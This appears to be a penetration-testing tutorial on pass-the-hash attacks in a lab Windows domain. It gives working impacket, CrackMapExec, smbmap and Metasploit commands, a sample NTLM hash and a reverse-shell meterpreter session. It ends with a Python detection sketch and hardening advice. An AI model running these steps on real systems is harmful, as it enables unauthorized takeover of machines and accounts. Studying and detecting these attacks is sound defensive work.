Domain Penetration Study (1): Windows Authentication Mechanisms
Domain Penetration Study (2): The Kerberos Protocol
Domain Penetration Study (3): Information Gathering Inside the Domain
Domain Penetration Study (4): Dump Password & Hash
Domain Penetration Study (5): IPC-based Remote Connections

PTH: Pass-the-Hash Attack

As covered in the earlier Windows Authentication Mechanisms post (Network Authentication, Net-NTLM section), once the NTLM hash of a user on the target machine has been obtained, it can be used directly to complete authentication; there is no need to crack the hash.

For extracting hashes, see Domain Penetration Study (4): Dump Password & Hash.

For example, the NTLM hash obtained here is 4d01fbeeaf2b706478943e0889df5622

Tools that can perform Pass-the-Hash:

Note that PTH is still carried out over an IPC remote connection, so the account-privilege requirements are the same as those described in Domain Penetration Study (5): IPC-based Remote Connections.

See in particular: the user-permission issues of IPC connections and PsExec.

impacket

pip3 install impacket
  • psexec.py
psexec.py -hashes :<hash> <domain>/<username>@192.168.10.2

  • smbexec.py
smbexec.py -hashes :<hash> <domain>/<username>@192.168.10.2

PS C:\Users\AresX> smbexec.py -hashes :4d01fbeeaf2b706478943e0889df5622 de1ay/administrator@192.168.10.201
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>

  • wmiexec.py

PS C:\Users\AresX> wmiexec.py -hashes :4d01fbeeaf2b706478943e0889df5622 de1ay/administrator@192.168.10.201 whoami
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] SMBv2.1 dialect used
de1ay\administrator

CrackMapExec

https://github.com/byt3bl33d3r/CrackMapExec/wiki

pip2 install crackmapexec

As of March 2020 the official program does not yet support Python 3.

Installing on Windows additionally requires Microsoft Visual C++ 14.0; installing in a *nix environment is recommended.

Passing the hash with CrackMapExec:

aresx@XXXXXXXXXX:~$ cme smb 192.168.10.201 -u administrator -H 4d01fbeeaf2b706478943e0889df5622 -x whoami
CME 192.168.10.201:445 PC [*] Windows 6.1 Build 7601 (name:PC) (domain:DE1AY)
CME 192.168.10.201:445 PC [+] DE1AY\administrator 4d01fbeeaf2b706478943e0889df5622 (Pwn3d!)
CME smb:445 XXXXXXXXXX [*] Windows 10.0 Build 18362 (name:XXXXXXXXXX) (domain:XXXXXXXXXX)
CME 192.168.10.201:445 PC [+] Executed command
CME 192.168.10.201:445 PC de1ay\administrator
[*] KTHXBYE!

Smbmap

https://github.com/ShawnDEvans/smbmap

PS E:\Tools\内网渗透工具集\smbmap> python3 .\smbmap.py -u administrator -d de1ay -p f471ca8ea823361ef9393d97e7a1873c:4d01fbeeaf2b706478943e0889df5622 -H 192.168.10.201
[+] IP: 192.168.10.201:445 Name: PC
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE 远程管理
C$ READ, WRITE 默认共享
IPC$ NO ACCESS 远程 IPC
PS E:\Tools\内网渗透工具集\smbmap>

Smbmap must be given the hash in the form LM Hash:NTLM Hash.

Metasploit

The module used is exploit/windows/smb/psexec.

Note that the hash entered here is LM Hash:NTLM Hash.


=[ metasploit v5.0.21-dev ]
+ -- --=[ 1889 exploits - 1065 auxiliary - 328 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]

[*] Starting persistent handler(s)...

msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/psexec) > set LHOST 192.168.10.1
LHOST => 192.168.10.1
msf5 exploit(windows/smb/psexec) > set LPORT 7778
LPORT => 7778
msf5 exploit(windows/smb/psexec) > set RHOSTS 192.168.10.201
RHOSTS => 192.168.10.201
msf5 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.10.201 yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.10.1 yes The listen address (an interface may be specified)
LPORT 7778 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic


msf5 exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf5 exploit(windows/smb/psexec) > set SMBPass f471ca8ea823361ef9393d97e7a1873c:4d01fbeeaf2b706478943e0889df5622 // LM hash before the colon, NTLM hash after it
SMBPass => f471ca8ea823361ef9393d97e7a1873c:4d01fbeeaf2b706478943e0889df5622
msf5 exploit(windows/smb/psexec) > set SMBDomain de1ay
SMBDomain => de1ay
msf5 exploit(windows/smb/psexec) > exploit

[*] Started reverse TCP handler on 192.168.10.1:7778
[*] 192.168.10.201:445 - Connecting to the server...
[*] 192.168.10.201:445 - Authenticating to 192.168.10.201:445|de1ay as user 'Administrator'...
[*] 192.168.10.201:445 - Selecting PowerShell target
[*] 192.168.10.201:445 - Executing the payload...
[+] 192.168.10.201:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 192.168.10.201
[*] Meterpreter session 1 opened (192.168.10.1:7778 -> 192.168.10.201:49482) at 2020-03-10 13:54:44 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
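Every run on this page reaches 192.168.10.201 by IP address and authenticates with the administrator's NTLM hash, so on the target the trace is a 4624 network logon (logon type 3) with authentication package NTLM, followed, for the psexec-style tools, by access to ADMIN$ (event 5140). The detection sketch below is an added example, not part of the original post; it runs over constructed, simplified log records, and KNOWN_HOSTS and PRIVILEGED are assumed inventories that a real deployment would pull from AD.

```python
from typing import Dict, List

# Constructed, simplified Security-log records (one key=value event per line);
# field names abbreviate the real 4624/5140 XML fields. The second record mirrors
# the CrackMapExec run above: an NTLM network logon to DE1AY\administrator from
# a workgroup host (XXXXXXXXXX) that is not part of the domain's inventory.
SAMPLE_LOG = """
EventID=4624 LogonType=3 AuthPkg=Kerberos TargetUser=svc_backup TargetDomain=DE1AY Workstation=WEB Source=192.168.10.8
EventID=4624 LogonType=3 AuthPkg=NTLM TargetUser=administrator TargetDomain=DE1AY Workstation=XXXXXXXXXX Source=192.168.10.1
EventID=5140 ShareName=ADMIN$ SubjectUser=administrator Source=192.168.10.1
EventID=4624 LogonType=3 AuthPkg=NTLM TargetUser=jdoe TargetDomain=DE1AY Workstation=PC Source=192.168.10.20
EventID=4624 LogonType=2 AuthPkg=Negotiate TargetUser=administrator TargetDomain=DE1AY Workstation=DC Source=-
"""

KNOWN_HOSTS = {"DC", "PC", "WEB"}   # assumed inventory of domain-joined machines
PRIVILEGED = {"administrator"}      # assumed high-value accounts
ADMIN_SHARES = ("ADMIN$", "C$")     # shares the psexec-style tools write to

def parse_event(line: str) -> Dict[str, str]:
    """Split 'Key=Value Key=Value ...' into a dict (values contain no spaces)."""
    return dict(tok.split("=", 1) for tok in line.split())

def find_pth_candidates(log: str) -> List[Dict[str, object]]:
    events = [parse_event(l) for l in log.splitlines() if l.strip()]
    hits: List[Dict[str, object]] = []
    for e in events:
        # Only network logons (type 3) that used NTLM matter: a stolen NT hash
        # cannot be used with Kerberos, and domain-joined hosts that address the
        # target by name would normally negotiate Kerberos instead.
        if not (e.get("EventID") == "4624" and e.get("LogonType") == "3"
                and e.get("AuthPkg") == "NTLM"):
            continue
        reasons = []
        if e.get("Workstation") not in KNOWN_HOSTS:
            reasons.append("unknown_workstation")
        if e.get("TargetUser", "").lower() in PRIVILEGED:
            reasons.append("privileged_account")
        if not reasons:
            continue
        # Follow-on access to ADMIN$/C$ from the same source strengthens the case.
        shares = sorted({s["ShareName"] for s in events
                         if s.get("EventID") == "5140"
                         and s.get("Source") == e.get("Source")
                         and s.get("ShareName", "").upper() in ADMIN_SHARES})
        hits.append({"account": f"{e['TargetDomain']}\\{e['TargetUser']}",
                     "source": e["Source"], "workstation": e["Workstation"],
                     "reasons": reasons, "admin_share_access": shares})
    return hits
```

NTLM logons to privileged accounts from hosts outside the inventory are the signal worth alerting on; reducing NTLM use (the "Network security: Restrict NTLM" policies, and the Protected Users group, whose members cannot authenticate with NTLM) shrinks the surface that every tool on this page depends on.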